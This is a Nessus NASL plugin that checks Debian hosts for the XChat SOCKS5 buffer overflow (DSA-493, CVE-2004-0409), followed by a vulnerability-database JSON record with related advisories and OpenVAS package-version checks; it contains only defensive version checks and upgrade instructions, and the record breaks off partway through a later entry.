Description
A buffer overflow has been discovered in the Socks-5 proxy code of
XChat, an IRC client for X similar to AmIRC. This allows an attacker
to execute arbitrary code on the user's machine.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-493. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration section: only the plugin metadata is recorded here. The
# scanner evaluates this branch while loading the plugin and the package
# check further down is not reached in that mode.
if (description)
{
  script_id(15330);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  # Identifiers of the issue: the CVE and the Debian advisory it was fixed in.
  script_cve_id("CVE-2004-0409");
  script_xref(name:"DSA", value:"493");

  script_name(english:"Debian DSA-493-1 : xchat - buffer overflow");
  script_summary(english:"Checks dpkg output for the updated package");

  # Report text. The description and solution wording comes from the
  # advisory (see the copyright note at the top of the file), so the
  # string literals below are kept verbatim.
  script_set_attribute(attribute:"synopsis", value:"The remote Debian host is missing a security-related update.");
  script_set_attribute(attribute:"description", value:
"A buffer overflow has been discovered in the Socks-5 proxy code of
XChat, an IRC client for X similar to AmIRC. This allows an attacker
to execute arbitrary code on the users' machine.");
  script_set_attribute(attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184");
  script_set_attribute(attribute:"see_also", value:"http://www.debian.org/security/2004/dsa-493");
  script_set_attribute(attribute:"solution", value:
"Upgrade the xchat and related packages.
For the stable distribution (woody) this problem has been fixed in
version 1.8.9-0woody3.");

  # Severity: CVSSv2 base vector for the advisory (network, low complexity,
  # no authentication, partial C/I/A impact).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  # A local check: it reads the dpkg package list gathered over SSH and
  # does not talk to the vulnerable code itself.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:xchat");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/04/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  # The KB keys tested by the package check below are required up front so
  # the plugin is only scheduled once the SSH info-gathering plugin has run.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}
include("audit.inc");
include("debian_package.inc");
# Package check: executed against a host after registration.
# Each precondition maps to the KB keys listed in script_require_keys();
# audit() records the reason and terminates the plugin when one is absent.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Every binary package built from the xchat source is compared against the
# fixed woody version from the advisory. Only release 3.0 is assessed here;
# deb_check() records each vulnerable match for the report and the counter
# is bumped so the verdict below can be taken once.
fixed = "1.8.9-0woody3";
vuln = 0;
foreach pkg (make_list("xchat", "xchat-common", "xchat-gnome", "xchat-text"))
{
  if (deb_check(release:"3.0", prefix:pkg, reference:fixed)) vuln++;
}

if (vuln > 0)
{
  # Verbose scans attach the per-package details collected by deb_check();
  # otherwise only the finding itself is reported.
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
audit(AUDIT_HOST_NOT, "affected");
{"id": "DEBIAN_DSA-493.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-493-1 : xchat - buffer overflow", "description": "A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.", "published": "2004-09-29T00:00:00", "modified": "2004-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/15330", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184", "http://www.debian.org/security/2004/dsa-493"], "cvelist": ["CVE-2004-0409"], "type": "nessus", "lastseen": "2021-01-06T10:02:47", "edition": 25, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0409"]}, {"type": "gentoo", "idList": ["GLSA-200404-15"]}, {"type": "osvdb", "idList": ["OSVDB:5490"]}, {"type": "redhat", "idList": ["RHSA-2004:585"]}, {"type": "openvas", "idList": ["OPENVAS:53185", "OPENVAS:52474", "OPENVAS:54554"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2004-036.NASL", "FREEBSD_PKG_8338A20F957311D893660020ED76EF5A.NASL", "FREEBSD_XCHAT_208_2.NASL", "REDHAT-RHSA-2004-585.NASL", "GENTOO_GLSA-200404-15.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:296"]}, {"type": "debian", "idList": ["DEBIAN:DSA-493-1:C476E"]}, {"type": "freebsd", "idList": ["8338A20F-9573-11D8-9366-0020ED76EF5A"]}], "modified": "2021-01-06T10:02:47", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-01-06T10:02:47", "rev": 2}, "vulnersScore": 7.2}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-493. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15330);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"DSA\", value:\"493\");\n\n script_name(english:\"Debian DSA-493-1 : xchat - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-493\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xchat and related packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network 
Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"xchat\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-common\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-gnome\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-text\", reference:\"1.8.9-0woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "15330", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:xchat"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to execute arbitrary code.", "edition": 3, "cvss3": {}, "published": "2004-06-01T04:00:00", "title": "CVE-2004-0409", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2004-0409"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:xchat:xchat:2.0.0", "cpe:/a:xchat:xchat:1.9.3", "cpe:/a:xchat:xchat:1.9.4", "cpe:/a:xchat:xchat:1.9.1", "cpe:/a:xchat:xchat:2.0.4", "cpe:/a:xchat:xchat:1.9.8", "cpe:/a:xchat:xchat:2.0.1", "cpe:/a:xchat:xchat:1.9.5", "cpe:/a:xchat:xchat:1.8.6", "cpe:/a:xchat:xchat:1.8.9", "cpe:/a:xchat:xchat:1.9.2", "cpe:/a:xchat:xchat:2.0.3", "cpe:/a:xchat:xchat:1.9.7", "cpe:/a:xchat:xchat:1.8.4", "cpe:/a:xchat:xchat:1.8.7", "cpe:/a:xchat:xchat:1.9.0", "cpe:/a:xchat:xchat:2.0.6", "cpe:/a:xchat:xchat:1.8.0", "cpe:/a:xchat:xchat:1.9.9", "cpe:/a:xchat:xchat:2.0.7", "cpe:/a:xchat:xchat:1.8.1", "cpe:/a:xchat:xchat:1.8.3", "cpe:/a:xchat:xchat:2.0.5", "cpe:/a:xchat:xchat:1.9.6", "cpe:/a:xchat:xchat:1.8.5", "cpe:/a:xchat:xchat:2.0.8", "cpe:/a:xchat:xchat:1.8.8", "cpe:/a:xchat:xchat:1.8.2", "cpe:/a:xchat:xchat:2.0.2"], "id": "CVE-2004-0409", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0409", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xchat:xchat:2.0.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:xchat:xchat:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.2:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:46", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "edition": 1, "description": "### Background\n\nXChat is a multiplatform IRC client. \n\n### Description\n\nThe SOCKS 5 proxy code in XChat is vulnerable to a remote exploit. Users would have to be using XChat through a SOCKS 5 server, enable SOCKS 5 traversal which is disabled by default and also connect to an attacker's custom proxy server. \n\n### Impact\n\nThis vulnerability may allow an attacker to run arbitrary code within the context of the user ID of the XChat client. \n\n### Workaround\n\nA workaround is not currently known for this issue. 
All users are advised to upgrade to the latest version of the affected package. \n\n### Resolution\n\nAll XChat users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-irc/xchat-2.0.8-r1\"\n # emerge \">=net-irc/xchat-2.0.8-r1\"\n\nNote that users of the gtk1 version of xchat (1.8.*) should upgrade to xchat-1.8.11-r1: \n \n \n # emerge sync\n \n # emerge -pv \"=net-irc/xchat-1.8.11-r1\"\n # emerge \"=net-irc/xchat-1.8.11-r1\"", "modified": "2006-05-22T00:00:00", "published": "2004-04-19T00:00:00", "id": "GLSA-200404-15", "href": "https://security.gentoo.org/glsa/200404-15", "type": "gentoo", "title": "XChat 2.0.x SOCKS5 Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "cvelist": ["CVE-2004-0409"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nThe vendor has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable use of Socks5 traversal (default off) in product.\n## Short Description\nA remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. 
With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.\n## References:\nVendor URL: http://www.xchat.org/\nSecurity Tracker: 1009865\n[Secunia Advisory ID:11409](https://secuniaresearch.flexerasoftware.com/advisories/11409/)\nOther Advisory URL: http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n[CVE-2004-0409](https://vulners.com/cve/CVE-2004-0409)\nBugtraq ID: 10168\n", "modified": "2004-04-19T04:27:30", "published": "2004-04-19T04:27:30", "href": "https://vulners.com/osvdb/OSVDB:5490", "id": "OSVDB:5490", "title": "XChat Socks-5 Overflow ", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:27", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "X-Chat is a graphical IRC chat client for the X Window System.\n\nA stack buffer overflow has been fixed in the SOCKSv5 proxy code.\nAn attacker could create a malicious SOCKSv5 proxy server in such a way\nthat X-Chat would execute arbitrary code if a victim configured X-Chat to\nuse the proxy. 
The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0409 to this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains a\nbackported security patch, and is not vulnerable to this issue.", "modified": "2019-03-22T23:43:37", "published": "2004-10-27T04:00:00", "id": "RHSA-2004:585", "href": "https://access.redhat.com/errata/RHSA-2004:585", "type": "redhat", "title": "(RHSA-2004:585) xchat security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:49:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200404-15.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54554", "href": "http://plugins.openvas.org/nasl.php?oid=54554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200404-15 (xchat)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"XChat is vulnerable to a stack overflow that may allow a remote attacker to\nrun arbitrary code.\";\ntag_solution = \"All XChat users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=net-irc/xchat-2.0.8-r1'\n # emerge '>=net-irc/xchat-2.0.8-r1'\n\nNote that users of the gtk1 version of xchat (1.8.*) should upgrade to\nxchat-1.8.11-r1:\n\n # emerge sync\n\n # emerge -pv '=net-irc/xchat-1.8.11-r1'\n # emerge '=net-irc/xchat-1.8.11-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200404-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=46856\nhttp://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200404-15.\";\n\n \n\nif(description)\n{\n script_id(54554);\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200404-15 (xchat)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-irc/xchat\", unaffected: make_list(\"ge 2.0.8-r1\"), vulnerable: make_list(\"lt 2.0.8-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing an update to xchat\nannounced via advisory DSA 493-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53185", "href": "http://plugins.openvas.org/nasl.php?oid=53185", "type": "openvas", "title": "Debian Security Advisory DSA 493-1 (xchat)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_493_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 493-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.0.8-1.\n\nWe recommend that you upgrade your xchat and related packages.\";\ntag_summary = \"The remote host is missing an update to xchat\nannounced via advisory DSA 493-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20493-1\";\n\nif(description)\n{\n script_id(53185);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 493-1 
(xchat)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"xchat-common\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat-gnome\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat-text\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52474", "href": "http://plugins.openvas.org/nasl.php?oid=52474", "type": "openvas", "title": "FreeBSD Ports: xchat2", "sourceData": "#\n#VID 8338a20f-9573-11d8-9366-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xchat2\n\nCVE-2004-0409\nStack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0\nto 2.0.8, with socks5 traversal enabled, allows remote attackers to\nexecute arbitrary code.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff\nhttp://marc.theaimsgroup.com/?l=xchat-announce&m=108114935507357\nhttp://www.vuxml.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52474);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: xchat2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xchat2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8\")>=0 && revcomp(a:bver, b:\"2.0.8_2\")<0) {\n txt += 'Package xchat2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:23:12", "edition": 1, "description": "The following package needs to be updated: xchat2", "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (204)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-07-06T00:00:00", "id": "FREEBSD_XCHAT_208_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12624", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_8338a20f957311d893660020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted 